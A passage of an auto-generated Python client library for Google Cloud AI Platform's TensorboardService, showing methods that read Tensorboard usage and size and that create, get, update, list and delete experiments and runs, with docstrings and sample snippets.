metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.aiplatform_v1.types.ReadTensorboardUsageResponse:
Response message for
[TensorboardService.ReadTensorboardUsage][google.cloud.aiplatform.v1.TensorboardService.ReadTensorboardUsage].
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([tensorboard])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a tensorboard_service.ReadTensorboardUsageRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, tensorboard_service.ReadTensorboardUsageRequest):
request = tensorboard_service.ReadTensorboardUsageRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if tensorboard is not None:
request.tensorboard = tensorboard
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.read_tensorboard_usage]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata(
(("tensorboard", request.tensorboard),)
),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
return response
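    # Illustrative sketch (not part of the generated surface): the flattened
    # ``tensorboard`` keyword from the signature above can be passed instead of a
    # fully built request object. The resource name is a placeholder.
    #
    #   usage = client.read_tensorboard_usage(
    #       tensorboard="projects/my-project/locations/us-central1/tensorboards/123"
    #   )
    #   print(usage)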
def read_tensorboard_size(
self,
request: Optional[
Union[tensorboard_service.ReadTensorboardSizeRequest, dict]
] = None,
*,
tensorboard: Optional[str] = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> tensorboard_service.ReadTensorboardSizeResponse:
r"""Returns the storage size for a given TensorBoard
instance.
.. code-block:: python
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import aiplatform_v1
def sample_read_tensorboard_size():
# Create a client
client = aiplatform_v1.TensorboardServiceClient()
# Initialize request argument(s)
request = aiplatform_v1.ReadTensorboardSizeRequest(
tensorboard="tensorboard_value",
)
# Make the request
response = client.read_tensorboard_size(request=request)
# Handle the response
print(response)
Args:
request (Union[google.cloud.aiplatform_v1.types.ReadTensorboardSizeRequest, dict]):
The request object. Request message for
[TensorboardService.ReadTensorboardSize][google.cloud.aiplatform.v1.TensorboardService.ReadTensorboardSize].
tensorboard (str):
Required. The name of the Tensorboard resource. Format:
``projects/{project}/locations/{location}/tensorboards/{tensorboard}``
This corresponds to the ``tensorboard`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.aiplatform_v1.types.ReadTensorboardSizeResponse:
Response message for
[TensorboardService.ReadTensorboardSize][google.cloud.aiplatform.v1.TensorboardService.ReadTensorboardSize].
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([tensorboard])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a tensorboard_service.ReadTensorboardSizeRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, tensorboard_service.ReadTensorboardSizeRequest):
request = tensorboard_service.ReadTensorboardSizeRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if tensorboard is not None:
request.tensorboard = tensorboard
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.read_tensorboard_size]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata(
(("tensorboard", request.tensorboard),)
),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
return response
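    # Illustrative sketch: the ``request`` argument also accepts a plain dict that
    # mirrors ReadTensorboardSizeRequest, as the Union[..., dict] annotation above
    # indicates. The resource name is a placeholder.
    #
    #   size = client.read_tensorboard_size(
    #       request={"tensorboard": "projects/my-project/locations/us-central1/tensorboards/123"}
    #   )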
def create_tensorboard_experiment(
self,
request: Optional[
Union[tensorboard_service.CreateTensorboardExperimentRequest, dict]
] = None,
*,
parent: Optional[str] = None,
tensorboard_experiment: Optional[
gca_tensorboard_experiment.TensorboardExperiment
] = None,
tensorboard_experiment_id: Optional[str] = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> gca_tensorboard_experiment.TensorboardExperiment:
r"""Creates a TensorboardExperiment.
.. code-block:: python
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import aiplatform_v1
def sample_create_tensorboard_experiment():
# Create a client
client = aiplatform_v1.TensorboardServiceClient()
# Initialize request argument(s)
request = aiplatform_v1.CreateTensorboardExperimentRequest(
parent="parent_value",
tensorboard_experiment_id="tensorboard_experiment_id_value",
)
# Make the request
response = client.create_tensorboard_experiment(request=request)
# Handle the response
print(response)
Args:
request (Union[google.cloud.aiplatform_v1.types.CreateTensorboardExperimentRequest, dict]):
The request object. Request message for
[TensorboardService.CreateTensorboardExperiment][google.cloud.aiplatform.v1.TensorboardService.CreateTensorboardExperiment].
parent (str):
Required. The resource name of the Tensorboard to create
the TensorboardExperiment in. Format:
``projects/{project}/locations/{location}/tensorboards/{tensorboard}``
This corresponds to the ``parent`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
tensorboard_experiment (google.cloud.aiplatform_v1.types.TensorboardExperiment):
The TensorboardExperiment to create.
This corresponds to the ``tensorboard_experiment`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
tensorboard_experiment_id (str):
Required. The ID to use for the Tensorboard experiment,
which becomes the final component of the Tensorboard
experiment's resource name.
This value should be 1-128 characters, and valid
characters are /[a-z][0-9]-/.
This corresponds to the ``tensorboard_experiment_id`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.aiplatform_v1.types.TensorboardExperiment:
A TensorboardExperiment is a group of
                TensorboardRuns that are typically the
results of a training job run, in a
Tensorboard.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any(
[parent, tensorboard_experiment, tensorboard_experiment_id]
)
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a tensorboard_service.CreateTensorboardExperimentRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(
request, tensorboard_service.CreateTensorboardExperimentRequest
):
request = tensorboard_service.CreateTensorboardExperimentRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if parent is not None:
request.parent = parent
if tensorboard_experiment is not None:
request.tensorboard_experiment = tensorboard_experiment
if tensorboard_experiment_id is not None:
request.tensorboard_experiment_id = tensorboard_experiment_id
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[
self._transport.create_tensorboard_experiment
]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
return response
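    # Illustrative sketch using the flattened arguments from the signature above;
    # the parent name, display name and experiment ID are placeholders.
    #
    #   experiment = client.create_tensorboard_experiment(
    #       parent="projects/my-project/locations/us-central1/tensorboards/123",
    #       tensorboard_experiment=aiplatform_v1.TensorboardExperiment(
    #           display_name="my experiment"
    #       ),
    #       tensorboard_experiment_id="my-experiment",
    #   )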
def get_tensorboard_experiment(
self,
request: Optional[
Union[tensorboard_service.GetTensorboardExperimentRequest, dict]
] = None,
*,
name: Optional[str] = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> tensorboard_experiment.TensorboardExperiment:
r"""Gets a TensorboardExperiment.
.. code-block:: python
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import aiplatform_v1
def sample_get_tensorboard_experiment():
# Create a client
client = aiplatform_v1.TensorboardServiceClient()
# Initialize request argument(s)
request = aiplatform_v1.GetTensorboardExperimentRequest(
name="name_value",
)
# Make the request
response = client.get_tensorboard_experiment(request=request)
# Handle the response
print(response)
Args:
request (Union[google.cloud.aiplatform_v1.types.GetTensorboardExperimentRequest, dict]):
The request object. Request message for
[TensorboardService.GetTensorboardExperiment][google.cloud.aiplatform.v1.TensorboardService.GetTensorboardExperiment].
name (str):
Required. The name of the TensorboardExperiment
resource. Format:
``projects/{project}/locations/{location}/tensorboards/{tensorboard}/experiments/{experiment}``
This corresponds to the ``name`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.aiplatform_v1.types.TensorboardExperiment:
A TensorboardExperiment is a group of
                TensorboardRuns that are typically the
results of a training job run, in a
Tensorboard.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([name])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a tensorboard_service.GetTensorboardExperimentRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, tensorboard_service.GetTensorboardExperimentRequest):
request = tensorboard_service.GetTensorboardExperimentRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if name is not None:
request.name = name
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[
self._transport.get_tensorboard_experiment
]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
return response
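    # Illustrative sketch: generated clients ship resource path helpers; assuming
    # the standard ``tensorboard_experiment_path`` helper, the name can be built
    # rather than hand-formatted. All identifiers are placeholders.
    #
    #   name = client.tensorboard_experiment_path(
    #       "my-project", "us-central1", "123", "my-experiment"
    #   )
    #   experiment = client.get_tensorboard_experiment(name=name)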
def update_tensorboard_experiment(
self,
request: Optional[
Union[tensorboard_service.UpdateTensorboardExperimentRequest, dict]
] = None,
*,
tensorboard_experiment: Optional[
gca_tensorboard_experiment.TensorboardExperiment
] = None,
update_mask: Optional[field_mask_pb2.FieldMask] = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> gca_tensorboard_experiment.TensorboardExperiment:
r"""Updates a TensorboardExperiment.
.. code-block:: python
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import aiplatform_v1
def sample_update_tensorboard_experiment():
# Create a client
client = aiplatform_v1.TensorboardServiceClient()
# Initialize request argument(s)
request = aiplatform_v1.UpdateTensorboardExperimentRequest(
)
# Make the request
response = client.update_tensorboard_experiment(request=request)
# Handle the response
print(response)
Args:
request (Union[google.cloud.aiplatform_v1.types.UpdateTensorboardExperimentRequest, dict]):
The request object. Request message for
[TensorboardService.UpdateTensorboardExperiment][google.cloud.aiplatform.v1.TensorboardService.UpdateTensorboardExperiment].
tensorboard_experiment (google.cloud.aiplatform_v1.types.TensorboardExperiment):
Required. The TensorboardExperiment's ``name`` field is
used to identify the TensorboardExperiment to be
updated. Format:
``projects/{project}/locations/{location}/tensorboards/{tensorboard}/experiments/{experiment}``
This corresponds to the ``tensorboard_experiment`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
update_mask (google.protobuf.field_mask_pb2.FieldMask):
Required. Field mask is used to specify the fields to be
overwritten in the TensorboardExperiment resource by the
update. The fields specified in the update_mask are
relative to the resource, not the full request. A field
is overwritten if it's in the mask. If the user does not
provide a mask then all fields are overwritten if new
values are specified.
This corresponds to the ``update_mask`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.aiplatform_v1.types.TensorboardExperiment:
A TensorboardExperiment is a group of
                TensorboardRuns that are typically the
results of a training job run, in a
Tensorboard.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([tensorboard_experiment, update_mask])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a tensorboard_service.UpdateTensorboardExperimentRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(
request, tensorboard_service.UpdateTensorboardExperimentRequest
):
request = tensorboard_service.UpdateTensorboardExperimentRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if tensorboard_experiment is not None:
request.tensorboard_experiment = tensorboard_experiment
if update_mask is not None:
request.update_mask = update_mask
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[
self._transport.update_tensorboard_experiment
]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata(
(("tensorboard_experiment.name", request.tensorboard_experiment.name),)
),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
return response
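    # Illustrative sketch: ``update_mask`` is a protobuf FieldMask naming the
    # fields to overwrite; here only ``display_name`` is replaced. The resource
    # name and new display name are placeholders.
    #
    #   from google.protobuf import field_mask_pb2
    #
    #   updated = client.update_tensorboard_experiment(
    #       tensorboard_experiment=aiplatform_v1.TensorboardExperiment(
    #           name="projects/my-project/locations/us-central1/tensorboards/123/experiments/my-experiment",
    #           display_name="renamed experiment",
    #       ),
    #       update_mask=field_mask_pb2.FieldMask(paths=["display_name"]),
    #   )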
def list_tensorboard_experiments(
self,
request: Optional[
Union[tensorboard_service.ListTensorboardExperimentsRequest, dict]
] = None,
*,
parent: Optional[str] = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> pagers.ListTensorboardExperimentsPager:
r"""Lists TensorboardExperiments in a Location.
.. code-block:: python
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import aiplatform_v1
def sample_list_tensorboard_experiments():
# Create a client
client = aiplatform_v1.TensorboardServiceClient()
# Initialize request argument(s)
request = aiplatform_v1.ListTensorboardExperimentsRequest(
parent="parent_value",
)
# Make the request
page_result = client.list_tensorboard_experiments(request=request)
# Handle the response
for response in page_result:
print(response)
Args:
request (Union[google.cloud.aiplatform_v1.types.ListTensorboardExperimentsRequest, dict]):
The request object. Request message for
[TensorboardService.ListTensorboardExperiments][google.cloud.aiplatform.v1.TensorboardService.ListTensorboardExperiments].
parent (str):
Required. The resource name of the Tensorboard to list
TensorboardExperiments. Format:
``projects/{project}/locations/{location}/tensorboards/{tensorboard}``
This corresponds to the ``parent`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.aiplatform_v1.services.tensorboard_service.pagers.ListTensorboardExperimentsPager:
Response message for
[TensorboardService.ListTensorboardExperiments][google.cloud.aiplatform.v1.TensorboardService.ListTensorboardExperiments].
Iterating over this object will yield results and
resolve additional pages automatically.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([parent])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a tensorboard_service.ListTensorboardExperimentsRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(
request, tensorboard_service.ListTensorboardExperimentsRequest
):
request = tensorboard_service.ListTensorboardExperimentsRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if parent is not None:
request.parent = parent
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[
self._transport.list_tensorboard_experiments
]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# This method is paged; wrap the response in a pager, which provides
# an `__iter__` convenience method.
response = pagers.ListTensorboardExperimentsPager(
method=rpc,
request=request,
response=response,
metadata=metadata,
)
# Done; return the response.
return response
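    # Illustrative sketch: the returned pager is directly iterable and fetches
    # additional pages lazily; generated pagers also expose a ``pages`` iterator
    # for page-level access. The parent name is a placeholder.
    #
    #   for experiment in client.list_tensorboard_experiments(
    #       parent="projects/my-project/locations/us-central1/tensorboards/123"
    #   ):
    #       print(experiment.name)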
def delete_tensorboard_experiment(
self,
request: Optional[
Union[tensorboard_service.DeleteTensorboardExperimentRequest, dict]
] = None,
*,
name: Optional[str] = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> gac_operation.Operation:
r"""Deletes a TensorboardExperiment.
.. code-block:: python
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import aiplatform_v1
def sample_delete_tensorboard_experiment():
# Create a client
client = aiplatform_v1.TensorboardServiceClient()
# Initialize request argument(s)
request = aiplatform_v1.DeleteTensorboardExperimentRequest(
name="name_value",
)
# Make the request
operation = client.delete_tensorboard_experiment(request=request)
print("Waiting for operation to complete...")
response = operation.result()
# Handle the response
print(response)
Args:
request (Union[google.cloud.aiplatform_v1.types.DeleteTensorboardExperimentRequest, dict]):
The request object. Request message for
[TensorboardService.DeleteTensorboardExperiment][google.cloud.aiplatform.v1.TensorboardService.DeleteTensorboardExperiment].
name (str):
Required. The name of the TensorboardExperiment to be
deleted. Format:
``projects/{project}/locations/{location}/tensorboards/{tensorboard}/experiments/{experiment}``
This corresponds to the ``name`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.api_core.operation.Operation:
An object representing a long-running operation.
The result type for the operation will be :class:`google.protobuf.empty_pb2.Empty` A generic empty message that you can re-use to avoid defining duplicated
empty messages in your APIs. A typical example is to
use it as the request or the response type of an API
method. For instance:
service Foo {
rpc Bar(google.protobuf.Empty) returns
(google.protobuf.Empty);
}
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([name])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a tensorboard_service.DeleteTensorboardExperimentRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(
request, tensorboard_service.DeleteTensorboardExperimentRequest
):
request = tensorboard_service.DeleteTensorboardExperimentRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if name is not None:
request.name = name
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[
self._transport.delete_tensorboard_experiment
]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Wrap the response in an operation future.
response = gac_operation.from_gapic(
response,
self._transport.operations_client,
empty_pb2.Empty,
metadata_type=gca_operation.DeleteOperationMetadata,
)
# Done; return the response.
return response
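    # Illustrative sketch: deletion returns a long-running operation future;
    # ``result()`` blocks until the server finishes and accepts an optional
    # timeout in seconds. The resource name is a placeholder.
    #
    #   operation = client.delete_tensorboard_experiment(
    #       name="projects/my-project/locations/us-central1/tensorboards/123/experiments/my-experiment"
    #   )
    #   operation.result(timeout=300)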
def create_tensorboard_run(
self,
request: Optional[
Union[tensorboard_service.CreateTensorboardRunRequest, dict]
] = None,
*,
parent: Optional[str] = None,
tensorboard_run: Optional[gca_tensorboard_run.TensorboardRun] = None,
tensorboard_run_id: Optional[str] = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> gca_tensorboard_run.TensorboardRun:
r"""Creates a TensorboardRun.
.. code-block:: python
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import aiplatform_v1
def sample_create_tensorboard_run():
# Create a client
client = aiplatform_v1.TensorboardServiceClient()
# Initialize request argument(s)
tensorboard_run = aiplatform_v1.TensorboardRun()
tensorboard_run.display_name = "display_name_value"
request = aiplatform_v1.CreateTensorboardRunRequest(
parent="parent_value",
tensorboard_run=tensorboard_run,
tensorboard_run_id="tensorboard_run_id_value",
)
# Make the request
response = client.create_tensorboard_run(request=request)
# Handle the response
print(response)
Args:
request (Union[google.cloud.aiplatform_v1.types.CreateTensorboardRunRequest, dict]):
The request object. Request message for
[TensorboardService.CreateTensorboardRun][google.cloud.aiplatform.v1.TensorboardService.CreateTensorboardRun].
parent (str):
Required. The resource name of the TensorboardExperiment
to create the TensorboardRun in. Format:
``projects/{project}/locations/{location}/tensorboards/{tensorboard}/experiments/{experiment}``
This corresponds to the ``parent`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
tensorboard_run (google.cloud.aiplatform_v1.types.TensorboardRun):
Required. The TensorboardRun to
create.
This corresponds to the ``tensorboard_run`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
tensorboard_run_id (str):
Required. The ID to use for the Tensorboard run, which
becomes the final component of the Tensorboard run's
resource name.
This value should be 1-128 characters, and valid
characters are /[a-z][0-9]-/.
This corresponds to the ``tensorboard_run_id`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.aiplatform_v1.types.TensorboardRun:
TensorboardRun maps to a specific
execution of a training job with a given
set of hyperparameter values, model
                definition, dataset, etc.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([parent, tensorboard_run, tensorboard_run_id])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a tensorboard_service.CreateTensorboardRunRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, tensorboard_service.CreateTensorboardRunRequest):
request = tensorboard_service.CreateTensorboardRunRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if parent is not None:
request.parent = parent
if tensorboard_run is not None:
request.tensorboard_run = tensorboard_run
if tensorboard_run_id is not None:
request.tensorboard_run_id = tensorboard_run_id
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.create_tensorboard_run]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
return response
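    # Illustrative sketch using the flattened arguments from the signature above;
    # the parent experiment name, display name and run ID are placeholders.
    #
    #   run = client.create_tensorboard_run(
    #       parent="projects/my-project/locations/us-central1/tensorboards/123/experiments/my-experiment",
    #       tensorboard_run=aiplatform_v1.TensorboardRun(display_name="trial 1"),
    #       tensorboard_run_id="trial-1",
    #   )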
def batch_create_tensorboard_runs(
self,
request: Optional[
Union[tensorboard_service.BatchCreateTensorboardRunsRequest, dict]
] = None,
*,
parent: Optional[str] = None,
requests: Optional[
MutableSequence[tensorboard_service.CreateTensorboardRunRequest]
] = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> tensorboard_service.BatchCreateTensorboardRunsResponse:
r"""Batch create TensorboardRuns.
.. code-block:: python
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import aiplatform_v1
def sample_batch_create_tensorboard_runs():
# Create a client
client = aiplatform_v1.TensorboardServiceClient()
# Initialize request argument(s)
requests = aiplatform_v1.CreateTensorboardRunRequest()
requests.parent = "parent_value"
requests.tensorboard_run.display_name = "display_name_value"
requests.tensorboard_run_id = "tensorboard_run_id_value"
request = aiplatform_v1.BatchCreateTensorboardRunsRequest(
parent="parent_value",
requests=requests,
)
# Make the request
response = client.batch_create_tensorboard_runs(request=request)
# Handle the response
print(response)
Args:
request (Union[google.cloud.aiplatform_v1.types.BatchCreateTensorboardRunsRequest, dict]):
The request object. Request message for
[TensorboardService.BatchCreateTensorboardRuns][google.cloud.aiplatform.v1.TensorboardService.BatchCreateTensorboardRuns].
parent (str):
Required. The resource name of the TensorboardExperiment
to create the TensorboardRuns in. Format:
``projects/{project}/locations/{location}/tensorboards/{tensorboard}/experiments/{experiment}``
The parent field in the CreateTensorboardRunRequest
messages must match this field.
This corresponds to the ``parent`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
requests (MutableSequence[google.cloud.aiplatform_v1.types.CreateTensorboardRunRequest]):
Required. The request message
specifying the TensorboardRuns to
create. A maximum of 1000
TensorboardRuns can be created in a
batch.
This corresponds to the ``requests`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.aiplatform_v1.types.BatchCreateTensorboardRunsResponse:
Response message for
[TensorboardService.BatchCreateTensorboardRuns][google.cloud.aiplatform.v1.TensorboardService.BatchCreateTensorboardRuns].
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([parent, requests])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a tensorboard_service.BatchCreateTensorboardRunsRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(
request, tensorboard_service.BatchCreateTensorboardRunsRequest
):
request = tensorboard_service.BatchCreateTensorboardRunsRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if parent is not None:
request.parent = parent
if requests is not None:
request.requests = requests
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[
self._transport.batch_create_tensorboard_runs
]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
